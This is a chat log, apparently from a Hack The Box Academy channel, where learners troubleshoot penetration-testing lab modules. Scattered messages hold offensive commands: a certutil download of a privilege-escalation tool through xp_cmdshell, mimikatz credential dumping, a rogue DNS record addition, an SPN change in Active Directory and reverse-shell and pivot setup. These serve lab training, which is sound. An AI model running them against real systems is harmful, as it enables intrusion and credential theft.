#modules
What do I do?
Okay thanks, I am running a full scan now. I am definitely not on right track rn.
137 is for netbios name service
Does anyone have any idea about this?
It helps to provide the module and section name
Shells and Payloads, section name shellbasics
I disabled the AV and still the powershell is getting crashed whenever I put in the revshell script.
Does this place have a season 8 discussion?
Please does anybody know why the internal hosts of the password attack's skill assessment are refusing connection? Even the Nmap scans keep on returning nothing other than the ports are filtered!
silly question. On this module am I supposed to try to ssh into what's given in the example or what? i don't understand, my prehistoric brain ain't registering it.
Have you found it?
No i'm still looking
DM me so I can save you from the unnecessary stress!
Please anybody who can help with this one?
filtered != closed
Alright! Thanks!
Hey I'm on the last question of the AEN- Web enumeration. I have my GET request to start socat shell, and my nc listener on attack hosts picks up connection but never connects. It eventually just times out on Burp Suite. Any suggestions?
wdym by "never connects"? do you not get any output from attempting something like ls?
it just stays on "listening on [any] 4444 ...
connect to [10.10.15.98] from (UNKNOWN) [10.129.229.147] 60678"
also be careful of spoiling stuff from AEN [you haven't yet] but the module is one big walkthrough. If you want to test your methodology/readiness for CPTS I suggest doing the remainder of the module blind
yeah and in nc did you try running any commands?
OMG lol

it's taking years to scan full UDP 🥲
ok. I was waiting before. I even typed space like when you have to connect to powershell in metasploit and sometimes have to use spacebar to open shell. lol. Anyways thanks @fathom pendant
yeah udp scans tend to take a lot longer since they don't do typical handshake stuff like tcp
when you say "blind" you just mean not posting here right? blind still means i can use notes
blind means not reading the questions or the module
just going until you reach the highest privileges in the domain
then returning and answering questions
A registry entry is made up of two pieces, a 'Key' and ' ' . What is the second piece?
apparently "value" isn't the answer
Hello guys, I'm doing "Exploiting Web Vulnerabilities in Thick-Client Applications" module
When running the command javac -cp fatty-client-new.jar fatty-client-new.jar.src/htb/fatty/client/gui/ClientGuiTest.java to compile the given file, it gives many errors related to the compilation process. I'm following the exercise, any suggestion?
@fathom pendant I didn't get my problem solved, could you please do it
if you have any idea about this.
Hello guys. could someone help me with some questions from the Password Attacks Skill Assessment lab?
If you don’t figure it out give me a DM I’ll explain it
Sent
Hey I'm stuck on the exact same spot. Did you ever figure this out?
sure shoot me a pm
Yes, I had retrieved the wrong tickets—I was using the old session instead of the new one. Just make sure you're using the correct session to get the right ticket
Hello there, someone out there did the Skill Assessment of Blind SQL Injection module?
Which DB i need to get the tables?
Is a time based SQLI that is taking so much time
it's been like 2 hours since I started my UDP scan for 1-10000 ports.
😭
Section: Firewall and IDS/IPS Evasion - Hard Lab
Can I DM someone to get a second opinion for what I am doing wrong with AD enum skills assessment I
Hi! I need help on where to start
I also need help for a protection thing for my laptop..Idk how to do that
protection thing?
Section: Firewall and IDS/IPS Evasion - Hard Lab
So I ran top 10000 UDP ports scan and found some ports, but I still dk what I am missing if 137 port isnt the right track.
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
@urban ore ^
Hey Guys! I have been working hard in the Skill Assessment on the Password Attack module. I already got a foot on DMZ01, and I am connected to JUMP01. However, I have not been able to elevate privileges yet. Mimikatz does not work without that. Nothing useful looking for passwords. Any suggestion? I appreciate that
Does anyone know any good modules for Linux privilege escalation and AD pentest?!
There are whole modules about linux privesc and AD.
PS. I got the flag. Had a hard time at this. (Firewall and IDS/IPS Evasion - Hard Lab)
Congratulations! @hushed furnace
I am working hard for that feeling too... I am really close
I'm trying to use the other two ip addresses that come up (ens224 and docker0) and I'm not connecting to agent after entering the start command in ligolo-ng
ligolo-ng pivot doesn't work in the AD Enumeration & Attacks - Skills Assessment Part II machine?
ligolo should work fine
I used wget and placed agent into ssh and proxy in local machine. I ran the
```
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcert
./agent -connect localmachine:11601 -ignore-cert
```
Found lo/ens192 (ssh)/ens224/docker0 ips
sudo ip route add ens224 or docker0 ip (without the / part since it doesn't work) dev ligolo in different sessions
Ran the start command on either ens224 and docker0 (didn't connect after attempting to)
Probably best to ask in #1024429874246590575 or maybe #general. Ligolo isn't covered in any of the modules.
Thank you! :)
or this series from our friend @gray yacht https://www.youtube.com/watch?v=de7IP_uZK6E&t=22s&ab_channel=r1ckyr3c0n
Demonstration of how to use ligolo-ng to perform a double pivot with Linux and Windows hosts.
Contents of this video:
00:00 - Intro
03:06 - First Pivot
09:04 - Second Pivot
16:37 - Conclusion
Ligolo-ng:
https://github.com/Nicocha30/ligolo-ng
Struggling with Web Services and API Attacks, when targeting a SOAP service, am I supposed to send requests to the wsdl or is there a better endpoint that I'm supposed to send it to?
at the introduction to assembly module i found
```
00000000 71E6 jno 0xffffffffffffffe8
00000002 BB4850C031 mov ebx,0x31c05048
00000007 48 rex.w
00000008 4853 push rbx
0000000A 2144AF66 and [rdi+rbp*4+0x66],eax
0000000E 7E16 jng 0x26
00000010 1BB57A7C4623 sbb esi,[rbp+0x23467c7a]
00000016 A7 cmpsd
00000017 BB344D26BF mov ebx,0xbf264d34
0000001C BB48534C9A mov ebx,0x9a4c5348
00000021 BB48534377 mov ebx,0x77435348
00000026 B64B mov dh,0x4b
00000028 53 push rbx
00000029 1271E7 adc dh,[rcx-0x19]
0000002C 2036 and [rsi],dh
0000002E 63 db 0x63
0000002F 10D2 adc dl,dl
00000031 144D adc al,0x4d
00000033 21444D2B and [rbp+rcx*2+0x2b],eax
00000037 B480 mov ah,0x80
00000039 4C180C93 o64 sbb [rbx+rdx*4],r9b
0000003D 1482 adc al,0x82
0000003F 1448 adc al,0x48
00000041 3481 xor al,0x81
00000043 F3148E rep adc al,0x8e
00000046 7894 js 0xffffffffffffffdc
00000048 8B0C03 mov ecx,[rbx+rax]
0000004B 148F adc al,0x8f
0000004D 7E20 jng 0x6f
0000004F 8C74801B mov [rax+rax*4+0x1b],segr6
00000053 740F jz 0x64
00000055 F31480 rep adc al,0x80
00000058 1D23148E68 sbb eax,0x688e1423
0000005D 94 xchg eax,esp
0000005E 8F db 0x8f
0000005F 63 db 0x63
00000060 148C adc al,0x8c
00000062 031480 add edx,[rax+rax*4]
00000065 50 push rax
00000066 F1 int1
00000067 EB20 jmp short 0x89
00000069 50 push rax
0000006A FFF3 push rbx
0000006C 1483 adc al,0x83
0000006E CC int3
0000006F 08 db 0x08
```
what do i do next
Anyone completed the 'Web Services and API Attacks' module that could spare a few minutes to help me understand this better?
where is the flag located? does it just print the flag or does it save a file
I have my ligolo-ng stuff saved in another doc for a different time. I'll figure it out later.
i'd just like objdump or binwalk that tbh
In
AD Enumeration & Attacks - Skills Assessment Part II
Submit the contents of the C:\flag.txt file on MS01.
Did you use x11 forwarding for xrdp?
yeah but they didnt print any stuff
idk how im supposed to approach it, i tried online assemblers and stuff
but i still cant find the flag
sorry was trying to look up that jno instr
can someone please help me with this error? The port is open, as per nmap. And I already added the entries on /etc/hosts
```
user@kali:~/Documents/src/krbrelayx$ python dnstool.py -u INLANEFREIGHT.LOCAL\\carole.rosa -p xxxxxxxx -r roguecomputer.INLANEFREIGHT.LOCAL -d 10.10.15.89 --action add 10.129.1.207
[-] Connecting to host...
[-] Binding to host
Traceback (most recent call last):
  File "/home/user/Documents/src/krbrelayx/dnstool.py", line 615, in <module>
    main()
  File "/home/user/Documents/src/krbrelayx/dnstool.py", line 431, in main
    if not c.bind():
           ^^^^^^^^
  File "/usr/lib/python3/dist-packages/ldap3/core/connection.py", line 589, in bind
    self.open(read_server_info=False)
  File "/usr/lib/python3/dist-packages/ldap3/strategy/sync.py", line 57, in open
    BaseStrategy.open(self, reset_usage, read_server_info)
  File "/usr/lib/python3/dist-packages/ldap3/strategy/base.py", line 146, in open
    raise exception_history[0][0]
ldap3.core.exceptions.LDAPSocketOpenError: socket connection error while opening: [Errno 113] No route to host
```
Hi. I am facing exact same error. Can I please DM you? I followed your steps but the error still persists.
The error says no route to host. Network problem.
I know, but there is a route
is pingable
And I added the entries into /etc/hosts
I also tried adding DC01, still same error
not sure if it is an issue with the VPN and HTB platform cannot reach back to my tun0
can you please tell me where the problem is or what to do?
double check all network configs to make sure you can reach the target, hostname, etc
I think I am not using the right IPs. Can you please clarify the following? the "-d" is to specify my own Kali IP and the "--action add" is to specify the Domain Controller's IP?
Or....
The "-d" is for the DC's IP and the 2nd IP, is tun0 or Kali?
sorry cant check rn busy. all i know is the error said no route to host so something related to network
Hello everyone. I'm stuck on the question in the "Race Conditions" section of the "Whitebox Attacks" module. I believe the vulnerability is in the "buy_product" function, since by running the application locally, I've managed to make two simultaneous requests using the last-byte synchronization technique, successfully purchasing two $10 gift cards with a $10 balance. However, I haven't been successful in exploiting the vulnerability in the target web application I've been given. Can someone please give me a clue?
what commands u guys usually use (for nmap) to scan all ports (faster)?
coz my nmap taking 40 mins to scan all ports of AEN first target : )
command used : nmap ip -p- -T4 -oA allports -n
nmap -p- -Pn -n --open [ip]
Once I get the open ports.... I dig deeper with -sCV
I use this bash script to make the 2nd part faster: https://gist.github.com/anibalardid/5e05b6472feb3d31116729dc24e6d3e2
Extract ports from nmap output #hack #security #s4vitar - extractPorts.sh
found the problem .... HTB command syntax is actually old. The flags are now different.
So I am having trouble with the subdomain bruteforcing module, I keep getting flagged by google and am getting an error when trying to use dnsenum.
best to say which module and section you're on. google shouldn't play a role at all.
Gonna sleep but I was wondering if anyone can point out which IP do I use for sudo ip route add <ip here> dev ligolo
@cloud urchin
Scraping inlanefreight.com subdomains from Google:
Error GETing http://www.google.com/sorry/index?continue=http://www.google.com/search%3Fhl%3Den%26source%3Dhp%26q%3D-www%2Bsite%253Ainlanefreight.com%26iflsig%3DAOw8s4IAAAAAaIcSZAoXfhz4WvXrqnSnXOZGLH0oJcfB%26gbv%3D1&hl=en&q=EgSVZvJnGNWInMQGIjCIJ_uiJYh5EnQHOoasMD0tlckSxixnJu7XSri1o4tv97yFRuHKR7TZAl9tqizuljAyAnJSWgFD: Too Many Requests at /usr/bin/dnsenum line 969.
information gathering - web edition / subdomain bruteforcing
yeah you're not doing something right. you're not supposed to brute force google.
use the command like it's shown in the section
dnsenum --enum inlanefreight.com -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
weird yeah mine doesn't do that maybe make sure it's up to date or something idk. i have 1.3.1
This is the command I am using, I have sliver and am seeing that It does show that there are google results as well in the solution
Im 1.3.1 as well
hmm
Mine keeps throwing an error, I'm using a VPN on top of OpenVPN might that do it?
Are you sure you mean .com and not .htb?
You are currently hammering against your resolver, which presumably limits the number of requests
Executing the shellcode just gives me a shell that instantly crashes or no shell at all
So inlanefreight.htb not .com?
Take a look at the task. It tells you which domain you should attack
Ya idk I keep getting an error, just read the github and apparently there was an issue with google scraping in 1.2.2
Really pay attention to the domain you are attacking. If I remember correctly, every task with DNS was with a .htb domain and not .com
I'm 99% its .com
"Using the known subdomains for inlanefreight.com (www, ns1, ns2, ns3, blog, support, customer), find any missing subdomains by brute-forcing possible domain names. Provide your answer with the complete subdomain, e.g., www.inlanefreight.com."
From the solution -
"Students need to use the dnsenum tool, supplying the subdomains-top1million-20000.txt wordlist from SecLists to bruteforce the subdomains of inlanefreight.com:"
If it says so in the task, then that is correct. However, make sure that your resolver does not limit the number of requests.
thanks its pretty faster than my command : D
why cant i type @ general
Did you ever figure this out? I can help if needed
Just DM me if you need help still
Hey @everyone, having trouble getting my Kali Linux to connect to Wi-Fi. My ping ## command shows 'Destination Host Unreachable' and 100% packet loss. Any ideas on what to check next? I'm running Kali in VMware. please help
Hey everyone! I have some doubts with Mass IDOR Enumeration module in Web Attacks. The url is supposed to show the uid parameters? Because is not my case, and I tried using the script described in the module and is not giving any results for the 20 first users.
Hey I just joined but I need sum help
Hi everyone, I'm new here ...an aspiring pen tester and CEH...your knowledge to go through the journey is really needed here
Hi please just ask your question instead of just saying I need help that doesn't really narrow it down.
Thanks
Thanks
need help in android static analysis module
under the subsection reversing hybrid apps
got the needed key but the unable to login, please help
Are you connected to a VPN?
No
The problem lies here
You need to download the VPN first, then connect to the VPN in Kali.
Hi all, seems I am stuck at this question in the "Android Fundamentals" module
Create an AVD for 'Pixel 3a API 34 Google APIs' using Android Studio. What is the build number of the device? (Format: build_number, Example: build_number-test)
I have created the AVD as specified and started it, it's working fine, I can obtained the information needed from the settings application, but I dont get it correct on submission, any help would be of importance to me, thank you
i got debug key but unable to use it in curl, it says invalid key
Downloading the VPN is not the problem, The huge problem is that I can not do anything in Kali linux, even opening/searching the HTB course
No network?
yes, no network
I mean my computer is connected to the Wi-Fi, its just the Machine that is not
Could someone help me with last part of Intro to Whitebox Pentesting? I don't understand where I get the flag after submitting to /patch
You can ask chatgpt, maybe it will give a better answer
not fully completed but which section you need help bro
Chatgpt failed me
anyone having issues with xfreerdp today on htb vpn?
I can't connect to the hosts at all, just hangs on black. 15 minutes I've been waiting since deploying the target & ive redeployed this is the second set of 15 minutes of waiting.
Any ideas?
I'm on Credentialed Enumeration - from Windows of Active Directory Enumeration & Attacks module.
Seems the lab from task just before this also not allowing the connection through:
Internal Password Spraying - From Windows
seems its about 2-3 minutes of waiting on black now and get this message in error logs.
Press enter
Really that simple? 😄 thanks man
if that doesn't work swap to rdesktop
Nope it totally worked, gonna go facepalm why I waited half an hour before asking
⬆️ Please I need help, I've been stuck on this question for almost 4 days.
I suggest you check your VM's network settings in VMWare/Virtualbox, whichever program you are using. You may also want to check if the routes are correct on your Kali machine and if the interfaces are up etc. Doing a traceroute may also give you a hint on where the problem is occurring
Hey, please DM to not spoil for others
Any one know how to solve file transfer module i stuck at second question where i need to upload a zip file in target machine but the credentials are incorrect
Good Morning All, jumping in here as I start the Exploit stage of AEN. Wish me luck!
Gooodluck Frost!
Could really use a hint why I don't get the flag in Intro to Whitebox Pentesting skills assessment 2 when my code doesn't have any injection vulnerabilities. To anyone getting stuck here, you need to write the throws OUTSIDE of the generatePassword function.
@digital pendant THANKS! I have been stuck in this spot for like a week, so really hoping to tear past it
You'll smash it 
Guys hello Has anyone who is here now done WPA2 attacks module?
I can't run air-hammer
Anyone have advice on module boxes, especially ones with pivoting and such, and how to make them load faster? I am port forwarding to see the web application but its not fully loading so I can't access a page
Any one can help me in Sherlock hard lab streamer
#sherlocks, if you don't have access read and follow #welcome
Hey folks, how you all doin.
Just want to get answer quickly. On htb question; What RFC specifies private ip ranges ?
I believe I entered correct answer but for some reason htb saying incorrect answer. It pissed me off. Thanks for your answer in advance.
Could you please also include the module and section that this question is from, just so people can easily help you if they've done the module
-# I have not done that module so I am unable to provide an answer, please be patient and someone will help you if/when they can
Module name Network foundation section Network address translation
Who in here can hack ?
Wtf
Not me thats for sure
attacking common services found the credentials tried to login to phpmyadmin but nothing is on the webpage
Go find your mama
🤨
why what for?
Hey, can anyone give help with a sanity check for the skill assessment in the TLS attack module? I found the attack vector but keep getting errors
My account
Well damn
contact support
Htb is likely robbing us folks. Need to lay down the money before it leads you to the answer.
dont make false statements @rain garnet
can any1 help 
what section is this
easy skill assessment
what module/section?
send me a dm with everything you got
Yes, it's true. I've got proof. The step-by-step solutions toggle is disabled, and when you try to turn it on, it won't let you. There's also that circle with the exclamation mark. If you click it, it says "Click here for an answer," but you gotta pay for a subscription first. Seriously? Mtf
Well, yes, solutions are only included with yearly plans
You can always ask for help here
Well F that.. i already subscribed before. I dont wanna waste my money.
But if you don't specify which section and module you're on - not many people will go looking themselves
sent a friend request
accepted @haughty fiber
This module and section @storm elk
Have you tried copy/pasting the answer as is mentioned on the page?
This works fine for me
RFC xxxx
yo so i am on the era machine right now i found the user.txt flag already but the website dosent accept it who can help me
I'll give that a try.
??
#1398707252629733436 - if you can't access this channel >> read and follow #welcome
and be patient @uncut zenith
Wtf xxxx is your answer, do you understand the question?
xxxx is not my answer
okay
for https://academy.hackthebox.com/module/20/section/226, i cracked the .cap file but it's not accepting the password as the answer. What do i enter? The question is 'Perform MIC cracking using the attached .cap file.', as you can see, it does not specifically ask for anything, just says to do mic cracking.
Anyone have WiFi material
When it says a module will take x days in the academy, how many hours is it talking about? 12, 24?
How many hours in a HTBA day?
8 hour days iirc
Sounds right. Had me panicking about the footprinting module taking "2 days"
Hi wanted to check one thing with the you all regarding windows evasion techniques module
I'm not sure why the flag is not being generated after placing properly made executable as mentioned in the question in the specified folder
When I read logs I'm seeing message like
Checking
Filename - ok - undetected by Microsoft Defender
Not sure if the check passed still why the flag is not being generated
hey I am doing web attacks skill assessment and the target is very slow, it takes nearly 40_50 seconds to refresh the page and my internet is not bad
Good morning everyone! 🙂
I'm doing the skill assessment for the Network Foundations module and I'm trying to login to the FTP service of my target machine via netcat
I ran the command "nc (target IP) 21" and got the welcome banner for the service like it says I should
The issue I'm having is that when I enter "USER anonymous" as directed I get the response "451 The parameter is incorrect." instead of "331 Anonymous access allowed"
Not sure if I'm entering it wrong but it looks like I followed the directions. Any ideas?
Give me the URL
10.129.233.197
Which module
Network Foundations
you can DM me if you still need help with this
USER anonymous[Ctrl+V][Enter][Enter]
I tried that and it didn't work 😅 it won't let me hit enter twice without returning the error message. It only lets me hit enter once and then I get the "Parameter is incorrect" message
Just like this
so I put an ^M after anonymous before I hit enter?
^M should be typed using [Ctrl+V][Enter][Enter]
Ohhhhhhhhhhhhhhh I misunderstood what the [Ctrl+V][Enter][Enter] was meant to do. I thought it was Ctrl+V to paste the user info and then try to hit enter twice lol I'm an idiot 😅
Thank you for the help!
No big deal — hitting a few bumps is just part of growing. We all have our “I’m such an idiot” moments, trust me.
That's true haha I'm brand new to all of this but I'm loving every second of it
In AD Enumeration & Attacks - Skills Assessment Part II
Am I able to access 172.16.7.50 xfreerdp from 172.16.7.240/23 ips? If so, I am unable to add the route for pivot using the sudo ip route add 172.16.7.0/23 dev ligolo with a Error: Invalid prefix for given prefix length. message but for some reason docker sudo ip route 172.17.0.0/16 dev ligolo but I am not able to xfreerdp to 172.16.7.50 from that pivot
I don't mind helping to troubleshoot this, you can DM if you'd like.
They fixed it!
hello, need help in AD enumeration and attacks
Hi mate, any chance you can tell me how you fixed the problem? I seem to be having the same issue as you mention and I can't escalate past user2 or get past the password request for the ssh. I must be doing something wrong but I have no idea what.
hi, could i get a nudge for windows lateral movement skills assessment on moving laterally to WSUS?
thanks!
I'd look over that document you likely identified earlier and see if there is anything specific about that host. Then it's all about whatever creds you have.
managed to get it to work albeit laggy, was just missing something stupid thanks!
How many functions can be exploited with the "nano" binary based on GTFObins?
https://academy.hackthebox.com/module/296/section/3398
I ran linpeas, what do i do?
nvm got it
Please pass on my thanks to whoever authored "AI Red Teaming" course. Its wonderfully written and very clearly explained the hard to understand and visualize mathematical terms
I would recommend this certification to be aligned with Mitre Atlas framework (https://atlas.mitre.org/matrices/ATLAS) and have modules associated with TTPs from this framework. This would be real AI red teaming
Probably best to submit feedback via /feedback
thanks
mount the drive
Copy/paste?
xfreerdp can do this
Copy paste does not work
how to copy paste using xfreerdp?
rdp also has the option to enable "share folder" and then copy paste
Then mounting a drive could work
Ok
yes that should work def, check the /drive switch for the xfreerdp command
In rdp can we mount th drive
hi does anyone know how to do this question; Try assembling and debugging the above code, and note how "call" and "ret" store and retrieve "rip" on the stack. What is the address at the top of the stack after entering "Exit"? (6-digit hex 0xaddress, without zeroes) Intro to Assembly Language module am stuck
did they mistake this with "linpeas.sh" ?
https://academy.hackthebox.com/module/296/section/3399
Might wanna report this to #1234357888114364508 , I do think you’re right
nvm
Struggling with "Web Services and API Attacks", trying to form a valid Login Request and I keep getting this error:
This is the script I'm using:
```
PAYLOAD='<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:tns="http://tempuri.org/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/">soap:Body<Login xmlns="http://tempuri.org/"><username>test</username><password>test</password></Login></soap:Body></soap:Envelope>'
HEADER="SOAPAction: Login"
echo $HEADER;
curl -X POST
-d $PAYLOAD
-H $HEADER
"http://:3002$1/wsdl"
```
What obvious thing am I doing wrong?
Yeah cause i been searching for that file for an hour now
and hasnt been anywhere
hey, for "password attacks" - "As this user, search through the additional shares they have access to and identify the password of a domain administrator. What is it?"
i can't seem to find the password, tried multiple tools, even mounted the shares and used grep, with a lot of filters
can i get a nudge on this please?
Nxc can help with the pattern option
the problem is not the tools, but the filter itself
I don't recall too much difficulty
i searched for all combinations of "password", "pass", "passwd", ..., domain name, user, admin, domain etc
i found like 7 passwords but they don't work
idk what to search for anymore, mind at least telling me the share? i tried the ones the new user has access to
Sec ill see what pattern I used
As a note you authenticated with the user:pass from the first q?
did you capitalize 'admin'?
yeah i even mounted the shares and used grep -ri
was it "Admin"? maybe i missed it
or the full word
oh okay will try it out, thank you so much
hi! i rebuilt my kali linux box and i can not use klist, it says it's not installed. What app can i install to make it work again?
i need it for pass the certificate
krb5-user
^
nice! thanks
always walk backwards from what you need;
- need klist
- what does klist do
- what might be required that klist does
- (GOOGLE)
Just finished the password attacks module, what a grind 😅 learned a lot!
unfortunately it didn't find anything with Admin :/
is it in one of the shares the previous user did not have access to? (Finance, Sales, Marketing)
try the full word
i mean if it can't find Admin it won't find Administrator as well
do you remember which share it was in?
@muted blade the password doesn't necessarily "need to work" just paste it into the answer field
make sure no extra spaces
yeah i was referring to the answer field, it doesn't work
ah forgot a symbol
yeah it worked now, thanks
Having trouble with:
AD Enumeration & Attacks - Skills Assessment Part II
Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.
When running `xp_cmdshell certutil -urlcache -split -f "http://172.16.7.240:8000/PrintSpoofer64.exe" c:\windows\temp\PrintSpoofer64.exe` output I either get
```
CertUtil: -URLCache command FAILED: 0x80190194 (-2145844844 HTTP_E_STATUS_NOT_FOUND)
CertUtil: Not found (404).
```
or
```
CertUtil: -URLCache command FAILED: 0x80072efd (WinHttp: 12029 ERROR_WINHTTP_CANNOT_CONNECT)
CertUtil: A connection with the server could not be established
```
Do I need to leave my ligolo pivot to solve this problem?
hey quick question, if I have a reverse shell meterpreter session, why would i need to use proxychains?
ur question is not clear
u would use a proxychain if you cannot access the internal network
ok to clarify if i already have root ssh access and ive established reverse shell on my attack host, why would i want to use proxychains? cant i just do everything i would with proxychaines in my metasploit reverse shell meterpreter session?
what proxychains does is it chains the connections of the proxy server/clients
Expected. If you look at the hybrid code one more time, you're missing one piece of information when constructing the http request
/endpoint?var=val is GET;
proxychains is basically "hey i have access, but i'd like to dive deeper"
u can't nmap for example
meterpreter is limited
though ligolo-ng is better overall as a pivoting tool over anything using proxychains
oh i thought there would have been a scanner on metasploit i can use if i background the meterpreter session
i generally don't use meterpreter all too much tbh so i'm not all too familiar with its routing
plus maybe u have tools on ur attack host that u want to execute on the target machine, and that would only work with a pivot
ahh okay
or finding/compiling a compatible binary to drop on the host/target
i mean yeah but it's a bit of a workaround and nmap offers more flexibility
yes exactly
yeah because i know i can do a host discovery through metasploit, but i guess you are right maybe an nmap provides more information
i ask because i really haven't used metasploit enough but from my experience and understanding, it pretty can do most of what other tools can as an all in-one. Can you give me examples of common tools/exploits that metasploit cant do ?
like common linux tools that you use locally that cannot be replicated in metasploit? which ones?
throughout ur studying ull have to download tens if not hundreds of tools from github or the internal in general, these tools will not be found in msfconsole
plus as an advice, u should always know that learning the manual steps is far more beneficial than just relying on automation
at least in the learning process
for sure
yes metasploit is very beneficial and cuts time but it is limited it doesn't have every tool in the world
Hi everyone, I'm stuck in the first phase of the "Skills Assessment" section of the "WhiteBox Attacks" module, as I've tried to bypass authentication using "Type Juggling" and the username "Larry" with several wordlists, but I haven't been successful. Could someone please give me a clue?
Hello can someone assist me
Im at https://academy.hackthebox.com/module/58/section/526 I found the first flag even, but when I enter in the little textbox it says it's incorrect. Idek what I am doing wrong cus everything seems right i got the flag but it shows it's wrong
https://academy.hackthebox.com/module/296/section/3401
the hostname in the crackmap output isnt the hostname apparently
I need help in the skill assessment "Injection Attacks" Module
Hey can I dm someone that has solved the advanced xss module - skill assessment? I am able to get the data from the api
Why the hell are there two different kinds of subscriptions, one for academy and one for boxes? I paid for the academy one and i would expect to be allowed to use pwnbox with unlimited time for boxes too
Well atleast i would expect unlimited pwnbox in both for that price
why
its expensive, and if i already get it i dont really see why it should be separated
If you are a student, Academy is 8 dollars
well im not
I don't find that expensive. Having said that, expensive is also relative. The concept changes depending on which country you are in and what you do.
Anyway, this is the Module channel. I suggest talking about that in general maybe?
cant talk in general
Hey everyone, I'm having a hard time with the Applications of AI in Infosec skills assessment. I figure using the multinomial naive bayes for text classification, like with the spam classifier, is the way to go.
I'm at the part where I'm trying to find the optimal parameter for classification and I'm getting an error that looks like it has to do with the test variables.
Can anyone help me out with this?
Either way, what pisses me off is that even with unlimited pwnbox in academy, if i use it once in academy and then go over to do a box, i have used my pwnbox time for the day even though i did not use it in the boxes section
Hello ppl this is krypton , i am a newbie looking for some help
I start networking fundamentals and it is going all over me head, what should i do? any suggestions for other good resources or should i just skip it and do another module?
hey can anyone tell me where to get static nmap version?
Start with the InfoSec module, that's the best thing to do, it doesn't overwhelm you with that many numbers, and it's very fundamental, and then you can go back to the networking module. If you have already done the "Introduction to InfoSec", then you could probably do the introduction to linux module first
Im pretty new too, so take it with a grain of salt
Go to #welcome and follow the provided steps to get access to more channels.
hi. I’m working on Windows Lateral Movement module. I’m on the Skills Assessment. Would like to ask a clarifying question about the second flag if anybody would be willing to give me a pointer. Thanks 🙂
photo from module?
talk in DM?
yes
talk me
Good night! Please help me, I can't find the password in question 1.
https://academy.hackthebox.com/module/147/section/1334
Some easy host based enumeration that leads you to something you can read should get some information to check out.
is it alright if I send you a DM?
Yeah that's fine
In
AD Enumeration & Attacks - Skills Assessment Part II
Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.
I'm trying to run https://github.com/ParrotSec/mimikatz/tree/master/Win32 version in mimikatz in the msfconsole windows shell but I keep getting this
This version of C:\mimikatz.exe is not compatible with the version of Windows you're running. Check your computer's system information and then contact the software publisher.
message even though the service is running in
C:\Windows\system32
Try from the official repository or the one from the module
Yo
Tysm
In AD Enumeration & Attacks - Skills Assessment Part II Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.
I'm getting an error when running
sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; mimikatz x86 cannot access x64 process
oh shoot I forgot to do the pid thing
I am mega stuck on this question: Try to bypass the client-side file type validations in the above exercise, then upload a web shell to read /flag.txt
I am in the file upload attacks section (client-side validation) I have followed the instructions to a T and nothing is working.
Didn't fix it
Hi everyone, I'm stuck in the first phase of the "Skills Assessment" section of the "WhiteBox Attacks" module, as I've tried to bypass authentication using "Type Juggling" and the username "Larry" with several wordlists, but I haven't been successful. Could someone please give me a clue?
Hey guys is there a mod here?
I wanna give u some information on a person using this server as a bait to text people offering hacking services and scamming them and I’d like to report it as this is against the rules
Are they in this server? If not, there's not a whole lot we can do.
If they have a website /spoiler (click the one that says "hackster")
some guy appears periodically and puts some phishing links I have seen him
Looks like there are NaN values in your label column. You may want to fill those NaN with fillna function of dataframe
Hey folks / Mods ... how common is Unconstrained Delegation - Users?
I honestly never seen that at work.
I finished the section. But I was puzzled to find this, to be honest.
It actually happens relatively frequently, you don't need a mod/admin to tell you that though
That's more a q for people that work in the field
Why do I get this error when the target system is windows 32
Read the error more carefully
You're using a 32bit binary to try and access a 64bit program
In other words: an impossible situation
x64 can read x32, but x32(x86) cannot read x64
I'll use 64 version.
My errors are so simple looking back.
I'll lyk if it works. Taking an eating break.
they r yeah
Take a look at the code, there's a piece of information needed to construct a http request.
Build number can be viewed in the Settings.
Build number can be viewed in the Settings of the AVD.
Thanks! I'll have to look into that tomorrow. My internet is currently down.
ok dm me the details then
apparently they left
alright not a lot i can do then
Isn't this right?
edition
Thanks
Try not to spoil modules above t0
How do I solve the problem
I'm trying to do a thing with crackmapexec in the deleted post but I'm getting the status_logon_failure error
That means the logon was not successful
The main issue is that the module solution has those credentials as the main login.
Probably. The main way still works.
Try not to spoil modules above t0
Is anyone able to access the target machine in CPTS Module Password Attacks: Attacking Windows Credential Manager. I'm unable to access, ping, or RDP into the target machine for this specific module. This issue seems to be isolated to this module, as I am able to access the target machines in other modules without any difficulty.
It’s not about rdp..do something else run nmap there are many ports
There is a switch in nmap which doesn’t need pinging and also if issue still persist reset the machine or download new vpn config tcp one
Hi, I'm with the Wi-Fi Penetration Testing Basics module, and at the Bypassing Mac Filtering section I have a problem. The second question requests connecting to 5G network, but I can't. I have bypassed the MAC filtering, but it prompts for a password. There isn't any wordlist or something like that in this machine, so I can't make a dictionary attack to gather the WPA2 key. Is there any problem with that? Has anyone resolved it?
Is there a maintained version of PowerSploit/PowerView ?
😔
Don't think so
Thanks anyways
NetExec took over CrackMapExec so I was hoping something similar here
guys there a problem with the module
https://academy.hackthebox.com/module/296/section/3403
i copied the first line of the file i found and it's not the correct answer
Re-read the section again. It tells you the password.
SuperNuts, may you help me out? The module is super easy but it doesn't seem like it gives me answer to submit it in. The whole literal line 1 of the file was copied and it doesnt work when i put it in
i haven't done that module so idk
actually it does spoil it
that's a tier 0 module
Oh it is?
which means you can post stuff about it
o okay perfect
https://academy.hackthebox.com/module/296/section/3403
Module: Pentest in a Nutshell
Section: Windows Vulnerability Assessment
Question: What is the content of the first line in the healthcheck.log file on the Windows target?
apparently what i got isnt the answer
look at the very first line of the section
i looked at the first line
no, on the page you're learning from. go over the section again.
I'm doing the AD ACL module of the CPTS path, why did the line below only work with -Credential set but not logged in as the same user (damundsen) ?
Set-DomainObject -Credential $Cred2 -Identity adunn -SET @{serviceprincipalname='notahacker/LEGIT'} -Verbose
im so confused
i told you. read the very first line in the section you're working on.
Hey guys
What is fastest & effective way to learn... Is starting from htb academy or go through htb labs to struggle & learn?
Heyo
Is general locked??
Idk im new here
Oh i see
hm I think academy is best
But im not too experienced
U think so?
yea cause you get the basics if youre a super beginner
